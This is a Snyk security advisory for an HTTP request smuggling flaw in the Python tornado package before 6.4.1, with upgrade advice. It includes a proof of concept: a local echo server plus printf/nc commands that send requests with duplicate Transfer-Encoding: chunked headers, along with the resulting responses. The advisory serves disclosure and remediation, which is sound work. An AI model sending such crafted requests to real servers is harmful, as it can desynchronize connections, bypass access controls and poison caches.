HTTP Request Smuggling Affecting tornado package, versions [,6.4.1)
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-TORNADO-7217829
- published 7 Jun 2024
- disclosed 6 Jun 2024
- credit Unknown
How to fix?
Upgrade tornado to version 6.4.1 or higher.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to HTTP Request Smuggling due to the handling of multiple Transfer-Encoding: chunked headers. An attacker can desynchronize the connection and potentially bypass ACLs or poison caches by sending crafted requests with duplicate Transfer-Encoding: chunked headers.
PoC
Install Tornado
Start a simple Tornado server that echoes each received request's body:
cat << EOF > server.py
import asyncio
import tornado
class MainHandler(tornado.web.RequestHandler):
def post(self):
self.write(self.request.body)
async def main():
tornado.web.Application([(r"/", MainHandler)]).listen(8000)
await asyncio.Event().wait()
asyncio.run(main())
EOF
python3 server.py &
Send a valid chunked request:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
Observe that the response is as expected:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1
Z
Send a request with two Transfer-Encoding: chunked headers:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
Observe the strange response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0
HTTP/1.1 400 Bad Request